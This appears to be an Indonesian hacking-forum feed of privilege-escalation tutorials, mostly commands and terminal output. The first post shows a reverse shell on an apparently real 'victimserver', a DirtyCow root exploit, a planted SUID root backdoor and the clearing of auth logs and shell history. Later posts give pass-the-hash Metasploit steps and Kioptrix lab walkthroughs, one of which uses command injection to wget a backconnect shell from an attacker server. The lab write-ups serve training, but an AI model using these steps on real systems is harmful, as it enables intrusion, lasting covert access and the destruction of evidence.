BackBox Indonesia - Privilege Escalation

Mempertahankan akses root dengan suid program (rootkit)

Tue, 27 Dec 2016 02:44:23 +0000

Hallo guys, kali ini saya akan membahas cara mempertahankan akses root server yang sudah kita rooting sebelumnya. Dalam thread kali ini saya tidak akan ngomong panjang lebar, tapi akan memberikan penjelasan singkat. ilustrasi di bawah adalah server yang sudah saya backconnect dan di rooting servernya terlebih dahulu.

Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55116
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl https://www.exploit-db.com/download/40616 -s -o dirtycow.c
$ gcc dirtycow.c -o dirtycow -pthread
$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
id
uid=0(root) gid=0(root) groups=0(root)
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# curl https://pastebin.com/raw/MPqsAfsY -s -o suid.c
root@victimserver:/var/www/html# cat suid.c
#include
#include
#include

int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
root@victimserver:/var/www/html# gcc suid.c -o rksh
root@victimserver:/var/www/html# chmod +s rksh
root@victimserver:/var/www/html# mv rksh /bin/rksh

Di atas adalah ilustrasi server yang sudah kita rooting dan di sisipkan suid program di folder /bin/
Untuk mengeksekusi suid yang sudah kita buat tadi kita bisa langsung meng eksekusinya di user biasa dengan ilustrasi seperti ini.

Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55216
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ rksh
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@victimserver:/var/www/html#

Setelah kita melakukan aktivitas tersebut, alangkah baiknya kita menghapus log yang telah kita tinggalkan. Cukup hapus log yang perlu saja jangan terlalu rusuh ngehapus semua lognya. Think smart bro :v

Quote:root@victimserver:/var/www/html# echo "" > /var/log/auth.log
root@victimserver:/var/www/html# echo "" > /var/log/apache2/access.log
root@victimserver:/var/www/html# echo "" > /var/log/lastlog
root@victimserver:/var/www/html# history -c

Mungkin cukup sekian tutorial singkat dari saya.
Thanks for reading :

Rooting server dari nmap (privilege escallation)

Tue, 30 Aug 2016 13:33:13 +0000

Selamat malam guys.
Udah lama ngga nongol bikin tutor nih.. heheheheh
Kali ini saya mau ngasih bocoran kalo nge rooting server dari nmap bisa loohhh..
Penasaran ya gimana caranya???
Tonton aja tutornya di mari..

Celah ini ngga berlaku di tiap versi nmap, apalagi nmap versi terbaru. so kalo kalian nemu server yang ke install nmap veri 4.53 atau versi terdahulu, mungkin bisa aja server yang kalian dapet itu bisa di rooting dengan cara ini..
Akhir kata dari ane..
Go open source indonesia :)

Horizontal Privilege Escalation dengan Metasploit - Pass the Hash attack

Sun, 26 Jun 2016 04:02:05 +0000

Horizontal privilege escalation adalah tahap ketika kita ingin mendapatkan hak akses yang tingkatnya sama alangkah untuk mengakses suatu yang kita tidak dapat akses. Biasanya Horizontal Privilege Escalation menyerang komputer berbeda dalam 1 network, untuk bypass Firewall, atau mendapatkan akses yang hanya suatu komputer bisa akses.

Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi

Mari langsung bahas aja ya :)

oke ketika kau sudah punya Meterpreter session masukan "hashdump"
perintah ini akan memberi username dan juga hash password dari username yang kita leak
kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP
liat sesi background kita dengan memasukan perintah "background"
kemudian masukan "route add (ip korban) (ip proxy mu)"

kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.101-120
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set verbose false
run

yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini

use windows/smb/psexec
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set RHOST 10.10.10.103
exploit

kemudian untuk membuktikan masukan
shell
ipconfig

selesai

Bash auto rooting server v3 (Exploit-db Collection)

Sun, 13 Mar 2016 09:08:15 +0000

Kali ini saya akan share tool untuk auto rooting server. tools ini gunanya untuk kalian yang suka rooting server atau yang suka belajar ctf dll..
Tools ini hanya work di linux arsitektur i368/32bit

Link download :

Code:
http://pastebin.com/LiiY8R0s

save dengan extensi .sh

Cara menggunakan :

Code:
$ chmod 0777 file.sh

$ bash file.sh

atau

$ sh file.sh

Screen shoot bisa lihat di sini

Terimakasih :D

Pembahasan Kioptrix Level 1 : SSL Exploit

Thu, 10 Mar 2016 11:42:40 +0000

Kioptrix Level 1 Mod SSL Exploit - Melanjutkan posting sebelum nya yang membahas cara exploit kiotrix di service samba Pembahasan Kioptrix Level 1 : Samba Exploit. untuk posting kali ini akan membahas bagaimana cara exploit kiotrix level 1 pada SSL nya sendiri yang mempunyai bug buffer overflow.

Tool Yang Dibutuhkan

Nmap
Metasploit
Nikto
Kioptrix Level 1 : Download disini

Mencari Ip Target
Dalam mencari ip target, saya menggunakan nmap dengan parameter -sn untuk melakukan Ping scan agar dapat mencari host yg live

Quote:root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:06 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00042s latency).
MAC Address: 00:0C:29:83:B2:94 (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.000044s latency).
MAC Address: 00:50:56:E2:65:F0 (VMware)
Nmap scan report for 192.168.33.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds

Scanning Service Pada Server
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter -sV untuk melakukan service version scanning

Quote:root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:38 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind     2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status      1 (RPC #100024)
MAC Address: 00:0C:29:83:B2:94 (VMware)

Scanning Web Server For Vulnerabilities
Nikto adalah salah satu tool yang digunakan untuk melakukan scanning terhadap web server sehingga bisa mengetahui 'vulnerabilities' pada suatu server.

Quote:root@ubuntu-linux:/home/aiden# nikto -h 192.168.33.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.33.128
+ Target Hostname:    192.168.33.128
+ Target Port:        80
+ Start Time:         2016-03-01 01:51:01 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 1146 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
........
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi...-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. ......

Yup disitu tertera kalau mod_ssl nya bisa kita remote exploit sehingga bisa mendapatkan remote shell

Exploit yang saya gunakan adalah OpenFuckV2 yang bisa di temukan di Exploit-DB
[+] Tapi untuk diketahui bahwa exploit OpenFuck sendiri merupakan exploit yang lama, sehingga membutuhkan sedikit tambahan pada script nya, untk mengetahui tambahan nya kunjungi link berikut : paulsec.github.io

[+] Pada step 2 memperbaiki exploit openfuck menggunakan link dl.packetstormsecurity.net untuk mendownload exploit ptrace-kmod.c, karena saya tau bahwa Kiotrix Server pada Lab saya tidak terkoneksi ke internet, jadi saya pindahkan ptrace-kmod.c ke localhost ( mv ptrace-kmod.c var/www/html ) , karena di local network tidak membutuhkan jaringan internet untuk saling berkomunikasi, sehingga menjadi seperti digambar

lalu setelah itu saya compile OpenFuck setelah mengikuti step di paulsec.github.io selain step no. 2

Exploiting Kioptrix SSL

Setelah exploitnya udh dicompile, saat nya eksekusi

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

Terdapat 2 address yang bisa kita gunakan untuk exploit, kita coba satu satu dari kedua pilihan tersebut. Tapi gmn cara saya tau kalau OS yang digunakan Redhat dan apache versi 1.3.20 ? coba cek lagi hasil scanning nmap nya :D

Target Address 0x6a = GAGAL !

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6a 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x81130e0
Ready to send shellcode
Spawning shell...
Good Bye!

Target Address 0x6b = SUKSES !

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6b 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; tp://192.168.33.1/ptrace-kmod.c; gcc
--13:45:33-- http://192.168.33.1/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.33.1:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

13:45:33 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 1340
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

[+] Awal nya target address 0x6b gagal seperti 0x6a tapi setelah saya eksekusi terus menurus sampai dgn 8 kali baru bisa mendapat remote shell seperti diatas, karena saya pikir kiotrix tersebut enggak saya perbaiki bug nya.

Goal dari kiotrix server adalah mendapatkan root shell, oleh karena itu pembahasan kali ini selesai sampai disini..

Akhir kata...

Semoga pembahasan ini dapat berguna bagi kita semua, dan saya mohon maaf apabila ada definisi yang salah.

Pembahasan Kioptrix Level 1 : Samba Exploit

Thu, 10 Mar 2016 11:40:57 +0000

Assalamualaikum...
Kioptrix Level 1 : Samba Exploit - untuk kesempatan kali ini saya akan membahas bagaimana mengexploit samba yang ada pada kiotrix server, kioptrix server adalah vulnerable os yang digunakan untuk tujuan pembelajaran dalam hal pentesting.

Tool Yang Dibutuhkan

Nmap
Metasploit
Kioptrix Level 1 : Download disini

Mencari Ip Target

Dalam mencari ip target, saya menggunakan nmap dengan parameter -sn untuk melakukan Ping scan agar dapat mencari host yg live

Quote:root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:06 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00042s latency).
MAC Address: 00:0C:29:83:B2:94 (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.000044s latency).
MAC Address: 00:50:56:E2:65:F0 (VMware)
Nmap scan report for 192.168.33.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds

Scanning Service Pada Server
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter -sV untuk melakukan service version scanning

Quote:root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:38 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind     2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status      1 (RPC #100024)
MAC Address: 00:0C:29:83:B2:94 (VMware)

Scanning Samba Version

Setelah melakukan service scanning kita lanjutkan dengan mencari versi dari samba yang sudah diinstall di kiotrix menggunakan modul auxiliary pada metasploit

Quote:msf > search smb_version

Matching Modules
================

   Name                               Disclosure Date Rank    Description
   ----                               --------------- ----    -----------
   auxiliary/scanner/smb/smb_version                   normal SMB Version Detection

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting Required Description
   ----       --------------- -------- -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 192.168.33.128
RHOSTS => 192.168.33.128
msf auxiliary(smb_version) > run

[*] 192.168.33.128:139 could not be identified: Unix (Samba 2.2.1a)
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed

[*]
Exploiting Samba

Kita tidak perlu bingung mau menggunakan exploit apa, karena samba 2.2.x memiliki exploit yang sudah dibuat yaitu 0x333hate => samba 2.2.x remote root exploit, sebenar nya bisa juga dengan trans2open exploit di metasploit, tapi karena metasploit saya lagi error jadi saya make 0x333hate yang base on trans2open.

~# wget http://downloads.securityfocus.com/vulne...x333hate.c
~# gcc 0x333hate.c -o xpl
~# ./xlp -t 192.168.33.1

kita sudah mendapatkan shell akses ke system kioptrix.

[*]

Ingat "Shell is Only the Beginning" , lalu apa yang harus dilakukan ? karena tidak ada clue, ane iseng mencari file .bash_history untuk melihat command apa aja yang pernah di ketik

[*]

Ada commad mail yang digunakan untuk email proses
lalu tinggal ketik aja di shell nya

Quote:# mail <-- untuk melihat list email
# exit <-- agar keluar dari perintah mail
# cat /var/mail/root

[*]

Rupa nya isi email tersebut agar kita bisa lanjut ke level 2 kiotrix nya ^_^

sekian tutorial sederhana dari saya. semoga dapat bermanfaat bagi kita semua dan mohon maaf apa bila ada salah pemberian definisi :D

Mendapatkan Root Akses Pada Kioptrix Level 4

Thu, 10 Mar 2016 11:05:19 +0000

Pada kesempatan kali ini saya akan membahas cara mendapatkan root akses pada server Kioptrix Level 4. Pada challenge level ini lumayan susah karena di server nya sudah dilengkapi rule iptables sehingga beberapa command seperti wget dari port 80 di block, dll.Oke langsung saja .

Untuk image OracleVM nya download disini :

Download Kioptrix Level 4

Ini tampilan awal dari webserver Kioptrix Level 4.

Saya mencoba melakukan bypass dengan memasukkan user dan password '=' 'or' tapi ternyata gagal. Berarti emmang tidak bisa di bypass.
Tapi ketika saya masukkan password dan user nya berupa ' ( petik satu ) , saya mendapatkan error.

Yup, kemungkinan vuln sqli.
Saya coba melakukan sqli post data menggunakan sqlmap.
Namun sebelumya saya gunakan live http header untuk meng-capture post di form login tadi.

sehingga command di sqlmap nya :
yuyudhn@linuxsec~$ sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&mypassword=%27&Submit=Login" --dbs .
Lanjutkan terus sampai menemukan password dan username nya.

Ternyata password nya plantext. Saya coba login dengan user john, karena password nya lebih mudah diingat.
Namun ketika saya login ternyata hanya tampilan username dan password saja.

Karena tidak ada clue lain , kita coba spawn shell via sqlmap.
yuyudhn@linuxsec~$ sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&mypassword=%27&Submit=Login" --os-shell

Untuk web server pilih php, direktori nya pilih /var/www , karena kita tadi sudah tahu di awal.

Sekarang kita coba mencari informasi database dengan melihat source checklogin.php .
os-shell> cat checklogin.php

Oppss... root user without password.

===
Lanjut kebawah...

Kita tinggalkan dulu. Sekarang kita coba login ssh dengan user john dan password MyNameIsJohn .
Ternyata masuk.

[img=320x0]https://2.bp.blogspot.com/-vH_WoGQY_ww/VuE_JJeC4AI/AAAAAAAAAx4/Z3YS6bzMyFM/s320/kioptrix4.png[/img]

Namun ternyata command command nya dibatasi.
Dan setelah googling kesana kemari akhirnya saya tau kalau ini nama nya lshell ( limited shell ) .
Tapi sepertinya di versi yang terinstall disini masih terdapat bug.
Sehingga kita bisa "keluar" dari batasan tadi dengan command :
john$ echo os.system('/bin/sh')
Ini untuk memanggil bash interpreter.

[img=320x0]https://2.bp.blogspot.com/-BiqOkH_AAHY/VuFAE2NvUAI/AAAAAAAAAyA/7LI9rp4pX0s/s320/kioptrix4.png[/img]

Karena goal akhir adalah mendapatkan hak akses root dengan cara apapun, saya pun mencoba untuk mendapatkan root dengan sudo. Tapi ternyata gagal.

[img=320x0]https://1.bp.blogspot.com/-XA5UFa1FIcs/VuFAtjLugYI/AAAAAAAAAyI/RknJ0lN3OCo/s320/kioptrix4.png[/img]

Saya coba login ke mysql dengan root user dan tanpa password. ( di step sebelumnya kita sudah mengetahui kalau root tidak di password )
$ mysql -u root

[img=320x0]https://2.bp.blogspot.com/-7oLNQGxZVs4/VuFBqHO-kqI/AAAAAAAAAyQ/OG_SebfLgCw/s320/kioptrix4.png[/img]

Nah kita tau versi MySQL nya adalah versi 5 dimana disini mendukung command untuk memanggil perintah eksternal lewat mysql pengunakan plugins mysqludf.
mysql> quit
$ whereis lib_mysqludf_sys.so

[img=320x0]https://2.bp.blogspot.com/-SvTvxm-eCTQ/VuFDBgt329I/AAAAAAAAAyc/fCJir2oxDiI/s320/kioptrix4.png[/img]

Nice, ternyata kioptrix sudah menyediakannya untuk kita sehingga kita tidak perlu mendownloadnya.
Kita masuk lagi ke mysql dan masuk ke salahsatu database.

[img=320x0]https://4.bp.blogspot.com/-E56setESee0/VuFDtpsfWZI/AAAAAAAAAyk/3t3whm3Bywc/s320/kioptrix4.png[/img]

Namun ketika saya memasukkan command :
mysql> select sys_eval('id');
Ternyata mendapat error karena module nya tidak ada.
Sekarang masukkan command :
mysql> create function sys_eval returns string soname 'lib_mysqludf_sys.so';

[img=320x0]https://1.bp.blogspot.com/-Mf7JUmGbsuo/VuFEnYELkuI/AAAAAAAAAys/pZrAuX1tb0M/s320/kioptrix4.png[/img]

root...
Sebenarnya karena goal dari Kioptrix adalah mendapat root, kita sudah selesai disini.
Tapi saya coba untuk mengangkat user john menjadi sudoers.
mysql> select sys_eval('usermod -a -G admin john');

[img=320x0]https://1.bp.blogspot.com/-sTdzKate2FE/VuFFL0Gmf1I/AAAAAAAAAy0/A6yEsLznIpQ/s320/kioptrix4.png[/img]

mysql>exit
$ sudo su
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root

[img=320x0]https://4.bp.blogspot.com/-JFwlAPBWhFI/VuFF2EKFZiI/AAAAAAAAAzA/cSVp_3VjuPI/s320/kioptrix4.png[/img]

Done..
Untuk video nya bisa disimak disini :

Nah sekian tutorial kali ini, semoga bermanfaat.
Share juga ke teman teman mu biar mereka tau.

Kioptrix Level 2 - Command Injection and Server Rooting

Wed, 09 Mar 2016 02:27:12 +0000

Kali ini saya akan menulis pembahasan dari Kioptrix Level 2 Challenge. Kioptrix sendiri adalah Oracle VM Image yang dirancang khusus untuk mendalami dasar dasar dari keamanan website dan jaringan. Jadi OS nya memang didesain vulnerable. Goal dari challenge Kioptrix sendiri adalah mendapatkan root access dari OS tadi, bagaimanapun cara nya. Sehingga kita bebas untuk masuk melalui celah apapun yang terbuka.
Oke langsung saja ya.

Download Kioptrix Level 2

Jalankan di Oracle VM.

nanti tampilanya seperti ini .

Nah seperti yang terlihat, disitu kalian tidak bisa masuk ke OS nya . Harus login . Dan kita tidak tau password nya apa, sehingga untuk mendapatkan akses kedalam nya kita harus menemukan celah.

Yep.. saatnya penetrasi.

Sebagai catatan, OS yang saya gunakan adalah Ubuntu yang sudah dilengkapi dengan tools pentest dari BackBox.

Oke, pertama, kita harus tau IP dari Kioptrix ini terlebih dahulu.

Kita scan via nmap.

uzumaki@linuxsec:~$ nmap -sn 192.168.43.1/24

-sn sendiri adalah perintah ping scan, maka akan terlihat host mana saja yang up. Berhubung yang saya gunakan adalah wifi pribadi, sehingga mudah saya ditemukan ip nya.

Setelah itu, buka IP Kioptrix tadi via browser.

Kita coba bypass sql login dengan user dan password '=' 'or'

Ternyata tembus.

Bagi yang belum tau tentang Bypass SQL Login, bisa baca baca disini :

Tutorial Bypass Admin Login Website

Saya skip skip saja ya tulisannya. Di akhir tulisan nanti saya lampirkan video nya jika kurang jelas.

Setelah beberapa kali dilakukan percobaan akhirnya diketahui kalau selain untuk pelakukan ping, kolom diatas juga bisa melakukan perintah perintah linux.

Tentu saja dengan command injection.

Disini saya akan melakukan back connect sehingga saya mengupload BackConnect Shell ke target.

command nya :

;wget http://serverkita/shell.txt -O /tmp/shell.php

Kita mengupload di folder /tmp karena hanya folder itu yang writable.

Untuk Shell nya silahkan download disini :

Download Back Connect Shell

Sesuaikan sendiri untuk ip dan port nya.

Selanjutya, kita buka terminal di main OS.

masukkan command :

uzumaki@linuxsec:~$ sudo nc -l 1337

1337 adalah port yang saya gunakan untuk back connect . Sama kan dengan yang ada di shell.

Nah , di web Kioptrix nya tadi, masukkan command :

;php /tmp/shell.php

Sesuaikan dengan nama shell mu.

Maka di terminal akan terbuka shell, namun masih regular user.

Sekarang masukkan command uname -a untuk mengetahui versi kernel yang digunakan target.

Nah, kernel yang digunakan lumayan sudah tua. jadi kemungkinan ada di Exploit-DB . kalian bisa cek sendiri di exploit-db dengan memasukkan versi kernel yang tertera.

Berhubung saya punya searchsploit, saya tinggal mencari nya lewat terminal.

bagi yang ingin menginstall bisa ikuti tutorial dibawah ini :

Cara Install Searchsploit di Ubuntu Linux

Oke lanjut, masukkan command :

uzumaki@linuxsec:~$ searchsploit kernel 2.6 root

Itu keyword yang saya gunakan untuk mencari localroot kernel 2.6 yang digunakan kioptrix.

Ada banyak output nya. Saya coba yang ring0 Root Exploit.

Lalu kita copy file .c nya ke /var/www/html agar bisa didownload.

uzumaki@linuxsec:~$ cp /path/to/searchsploit/localroot.c /var/www/html/root.c

Selanjutnya dari shell yang didapat dari back connect sebelumnya, kita download dan kita compile exploit tadi.

sh-3.00$ cd /tmp

sh-3.00$ wget http://serverkita/root.c /tmp/root.c

sh-3.00$ gcc root.c -o rootme

sh-3.00$ chmod +x rootme

Lalu kita jalankan exploit nya dengan command :

sh-3.00$ ./rootme

Maka kalian akan masuk ke root.

sh-3.00# whoami

root

Misi terselesaikan..

Bagi yang kurang jelas bisa lihat video dibawah :

Mungkin kurang menantang bagi kalian yang sudah expert di bidang pentesting, tapi sekali lagi tujuan dari Kioptrix sendiri adalah untuk pembelajaran dasar, sehinga lebih diperuntukkan kepada pemula yang ingin tahu bagaimana alur serangan dilakukan.

jadi buat kalian yang masih awam, silahkan mencoba.

Sekian tutorial kali ini, semoga bermanfaat, share juga ke teman temanmu biar mereka tau.